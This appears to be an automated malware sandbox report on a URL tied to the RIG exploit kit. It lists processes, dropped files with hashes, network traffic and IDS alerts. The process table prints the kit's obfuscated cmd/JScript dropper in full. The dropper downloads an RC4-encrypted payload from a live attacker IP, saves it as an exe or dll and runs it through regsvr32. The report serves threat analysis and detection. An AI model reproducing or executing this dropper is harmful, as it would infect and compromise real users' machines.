URL: | http://cryptomoneyinsider.site/gdte68712?cpm_id=372178644&cpm_cost=0.0023 |
Full analysis: | https://app.any.run/tasks/a9a587d8-412b-42cd-a77f-ec45c3a88454 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2020, 05:29:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 2469DB1918E44CB76BE2D07E34090FD7 |
SHA1: | 6AAF5EF5D59A78F94AEC397058C3BA9869791D0F |
SHA256: | 3F2E34DDF6E581001995674D059355FD28A3D5628C946E24CAB2F665DE165D39 |
SSDEEP: | 3:N1KdX3cBAXiHBR2Hin2USRuHIYo:Cd1yHBRiin2AHIYo |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
580 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://cryptomoneyinsider.site/gdte68712?cpm_id=372178644&cpm_cost=0.0023" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
3140 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:580 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2588 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.172/?NTc0NjIw&DxaLs&JtdOt=filly&MCTmmfqcK=border&UtJlzD=difference&fDrziK=dinamic&OQda=electrical&f54hgffs=xHfQMrnYbRjFFYXfKPPEUKNEMUfWA0CKwYiZhanVF5mxFDHGpbT1FxXspVSdCFqEmvVvdLsHIwSh1U3ASwMzlI&t4gfgfdf4=gLV1MU86Gr3UfUyRGbgp7T-ByLMwJB-ZSRHLg431WnybkSdcwvkh-Av2ZYzeItV10Q4Q0WnKfNEKj58EkwV0QC&LVGPfRV=filly&SwIvQ=electrical&qfTL=filly&tOvuXek=callous&gdCxCLhUq=filly&yvT=abettor&IQob=abettor&mbbhHNTM3MTI1" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
816 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.172/?NTc0NjIw&DxaLs&JtdOt=filly&MCTmmfqcK=border&UtJlzD=difference&fDrziK=dinamic&OQda=electrical&f54hgffs=xHfQMrnYbRjFFYXfKPPEUKNEMUfWA0CKwYiZhanVF5mxFDHGpbT1FxXspVSdCFqEmvVvdLsHIwSh1U3ASwMzlI&t4gfgfdf4=gLV1MU86Gr3UfUyRGbgp7T-ByLMwJB-ZSRHLg431WnybkSdcwvkh-Av2ZYzeItV10Q4Q0WnKfNEKj58EkwV0QC&LVGPfRV=filly&SwIvQ=electrical&qfTL=filly&tOvuXek=callous&gdCxCLhUq=filly&yvT=abettor&IQob=abettor&mbbhHNTM3MTI1" "¤" | C:\Windows\system32\wscript.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2124 | "C:\Windows\System32\cmd.exe" /c regsvr32.exe /s 6v7amfv9.dll | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 3 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3264 | regsvr32.exe /s 6v7amfv9.dll | C:\Windows\system32\regsvr32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft(C) Register Server Exit code: 3 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3640 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:580 CREDAT:3937553 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
3868 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:580 CREDAT:3740945 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2392 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.172/?MjI1MDg3&rJyCZ&mHZup=irreverent&igPrhxY=everyone&JFUJiaWti=callous&ioWd=border&fbWsbZCg=callous&t4gfgfdf4=BOFfANlmd1bU1oU8Kv_i0jTmxKVhpOK-xaKMwND-ZeTHOQ53gv9zrckdM0hxRKC4WdY_O1AElkZ0Q&jXYiRM=abettor&ijb=consignment&YPW=community&emHc=electrical&ViNekuB=irreverent&iIeJILR=community&Mqghima=irreverent&f54hgffs=xXnQMvWVbRXQAp3EKvLcT6NCMVHRGkCL2YadmrHZefjafFWkzrTFTF_6ozKATASG6_ptdfJZDVHph&kYgAckzRMTI0OTI4" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3164 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.172/?MjI1MDg3&rJyCZ&mHZup=irreverent&igPrhxY=everyone&JFUJiaWti=callous&ioWd=border&fbWsbZCg=callous&t4gfgfdf4=BOFfANlmd1bU1oU8Kv_i0jTmxKVhpOK-xaKMwND-ZeTHOQ53gv9zrckdM0hxRKC4WdY_O1AElkZ0Q&jXYiRM=abettor&ijb=consignment&YPW=community&emHc=electrical&ViNekuB=irreverent&iIeJILR=community&Mqghima=irreverent&f54hgffs=xXnQMvWVbRXQAp3EKvLcT6NCMVHRGkCL2YadmrHZefjafFWkzrTFTF_6ozKATASG6_ptdfJZDVHph&kYgAckzRMTI0OTI4" "¤" | C:\Windows\system32\wscript.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
580 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
580 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFB73CB8991FFC63D3.TMP | — | |
MD5:— | SHA256:— | |||
580 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF1330D20D278754E2.TMP | — | |
MD5:— | SHA256:— | |||
580 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFDFFC15E33C8F5075.TMP | — | |
MD5:— | SHA256:— | |||
2588 | cmd.exe | C:\Users\admin\AppData\Local\Temp\Low\1.tmp | text | |
MD5:0588827E3B9029251A49C864D3424BBF | SHA256:D8521925E75E53D660D70E6BEE1384A3D8F4E90AD841A04EF8220833CB066CE8 | |||
3164 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Low\nlhwjpeh.dll | binary | |
MD5:1912B2FFB26670D552C57A89743AF524 | SHA256:27DF00031567D90B02C66E3A752DC17B02A91E47FFE3D148F118B6233D368822 | |||
816 | wscript.exe | C:\Users\admin\AppData\Local\Temp\Low\6v7amfv9.dll | binary | |
MD5:1912B2FFB26670D552C57A89743AF524 | SHA256:27DF00031567D90B02C66E3A752DC17B02A91E47FFE3D148F118B6233D368822 | |||
3140 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\PGXAICWX.htm | binary | |
MD5:063D4DE864C10BC8DBCCAA2CAF4E95A1 | SHA256:C5D745327563448E6919D596AB077C72C75E63EE58847494928640069686EF96 | |||
580 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active\{BE2916BA-7310-11EA-972D-5254004A04AF}.dat | binary | |
MD5:EE71263856870DC186235AB6681F4172 | SHA256:39B2AD7D3DCE0A33BE8FD46BC5E5E686F61501898B8BDCF21CC0262451204DF6 | |||
3140 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\8QU1CQCK.txt | text | |
MD5:AE3DEF37CD09710499486FB173855A67 | SHA256:589B288A9E4F3392ECD279453A9ABDB6DAA6B0B61253A22D664A139D8F28E214 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3140 | iexplore.exe | GET | 302 | 185.220.35.26:80 | http://cryptomoneyinsider.site/gdte68712?cpm_id=372178644&cpm_cost=0.0023 | unknown | — | — | suspicious |
580 | iexplore.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/favicon.ico | RU | — | — | suspicious |
580 | iexplore.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/favicon.ico | RU | — | — | suspicious |
3140 | iexplore.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/?NjIxNTE1&SFu&t4gfgfdf4=hp_sqe7dXOQayhESAfAcwmYlbAF4V86GpjUaHzxCZh5_X_0OFYA11z6LRVvQ92w&brMrlL=accelerator&BVWPGoU=electrical&GpOYbgjN=disagree&f54hgffs=wHbQMvXcJwDHFYbGMvrERqNbNknQA0GPxpH2_drWdZqxKGni1ub5UUSk6FuCEh3&nlnKsfu=everyone&zaps=callous&UAUw=mustard&Mpc=community&ZlSaLYgUR=disagree&bvzF=irreverent&tpD=disagree&ldffephA=community&wll=dinamic&DwOMkyaNDUxNzEy | RU | binary | 41.4 Kb | suspicious |
3640 | iexplore.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/?NjIxNTE1&SFu&t4gfgfdf4=hp_sqe7dXOQayhESAfAcwmYlbAF4V86GpjUaHzxCZh5_X_0OFYA11z6LRVvQ92w&brMrlL=accelerator&BVWPGoU=electrical&GpOYbgjN=disagree&f54hgffs=wHbQMvXcJwDHFYbGMvrERqNbNknQA0GPxpH2_drWdZqxKGni1ub5UUSk6FuCEh3&nlnKsfu=everyone&zaps=callous&UAUw=mustard&Mpc=community&ZlSaLYgUR=disagree&bvzF=irreverent&tpD=disagree&ldffephA=community&wll=dinamic&DwOMkyaNDUxNzEy | RU | binary | 41.3 Kb | suspicious |
3164 | wscript.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/?MjI1MDg3&rJyCZ&mHZup=irreverent&igPrhxY=everyone&JFUJiaWti=callous&ioWd=border&fbWsbZCg=callous&t4gfgfdf4=BOFfANlmd1bU1oU8Kv_i0jTmxKVhpOK-xaKMwND-ZeTHOQ53gv9zrckdM0hxRKC4WdY_O1AElkZ0Q&jXYiRM=abettor&ijb=consignment&YPW=community&emHc=electrical&ViNekuB=irreverent&iIeJILR=community&Mqghima=irreverent&f54hgffs=xXnQMvWVbRXQAp3EKvLcT6NCMVHRGkCL2YadmrHZefjafFWkzrTFTF_6ozKATASG6_ptdfJZDVHph&kYgAckzRMTI0OTI4 | RU | binary | 305 Kb | suspicious |
3308 | chrome.exe | GET | 200 | 185.43.4.172:80 | http://185.43.4.172/?NjIxNTE1&SFu&t4gfgfdf4=hp_sqe7dXOQayhESAfAcwmYlbAF4V86GpjUaHzxCZh5_X_0OFYA11z6LRVvQ92w&brMrlL=accelerator&BVWPGoU=electrical&GpOYbgjN=disagree&f54hgffs=wHbQMvXcJwDHFYbGMvrERqNbNknQA0GPxpH2_drWdZqxKGni1ub5UUSk6FuCEh3&nlnKsfu=everyone&zaps=callous&UAUw=mustard&Mpc=community&ZlSaLYgUR=disagree&bvzF=irreverent&tpD=disagree&ldffephA=community&wll=dinamic&DwOMkyaNDUxNzEy | RU | binary | 41.3 Kb | suspicious |
580 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
580 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
3308 | chrome.exe | GET | 302 | 216.58.205.238:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx | US | html | 544 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
580 | iexplore.exe | 185.43.4.172:80 | — | JSC ISPsystem | RU | suspicious |
3140 | iexplore.exe | 185.220.35.26:80 | cryptomoneyinsider.site | — | — | suspicious |
580 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3140 | iexplore.exe | 185.43.4.172:80 | — | JSC ISPsystem | RU | suspicious |
3640 | iexplore.exe | 185.43.4.172:80 | — | JSC ISPsystem | RU | suspicious |
816 | wscript.exe | 185.43.4.172:80 | — | JSC ISPsystem | RU | suspicious |
3164 | wscript.exe | 185.43.4.172:80 | — | JSC ISPsystem | RU | suspicious |
580 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3308 | chrome.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
3308 | chrome.exe | 172.217.21.238:443 | clients2.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
cryptomoneyinsider.site |
| suspicious |
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
www.google.com.ua |
| whitelisted |
www.google.com |
| whitelisted |
clients2.google.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3140 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
816 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
816 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |
3640 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3164 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
3164 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |
3308 | chrome.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3308 | chrome.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3308 | chrome.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3308 | chrome.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |